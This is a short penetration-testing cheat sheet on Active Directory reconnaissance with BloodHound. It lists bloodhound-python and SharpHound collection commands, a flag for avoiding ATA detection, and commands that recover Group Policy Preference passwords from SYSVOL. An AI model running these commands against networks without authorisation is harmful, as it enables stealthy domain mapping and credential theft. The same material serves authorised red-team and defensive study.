BloodHound Enumeration

BloodHound

Enable Sharp-Hound

Supply data to BloodHound

The generated archive can be uploaded to the BloodHound application.

Remote BloodHound

bloodhound-python -u <UserName> -p <Password> -ns <Domain Controller's Ip> -d <Domain> -c All
bloodhound-python -u user -p password -ns 192.168.1.5 -d hacktor.local -c All

On-Site BloodHound

#Using exe investor
.\SharpHound.exe --CollectionMethod All --LdapUsername <UserName> --LdapPassword <Password> --domain <Domain> --domaincontroller <Domain Controller's Ip> --OutputDirectory <PathToFile>

.\SharpHound.exe  All
#Using PowerShell module investor
. .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All --LdapUsername <UserName> --LdapPassword <Password> --OutputDirectory <PathToFile>

. .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All,LoggedOn

To avoid detections like ATA

Invoke-BloodHound -CollectionMethod All -ExcludeDC

Neo4j

Start neo4j and BloodHound UI on kali machine and load the zip/json files

sudo neo4j start

if you found win server lessThan 2016 like as 2012 R2 or less you can use these commands to show local users

this option (Local user) unavailable on win server 2016

#To show password # from powersploit 
Get-GPPPassword -Server PDC.wargrey.mon
#also to show password from sysvol in winServer2012 
findstr /S /I cpassword \\PDC\sysvol\wargrey.mon\Policies\*.xml

PreviousUsers, Computer, Groups NextCredentials

Last updated 1 year ago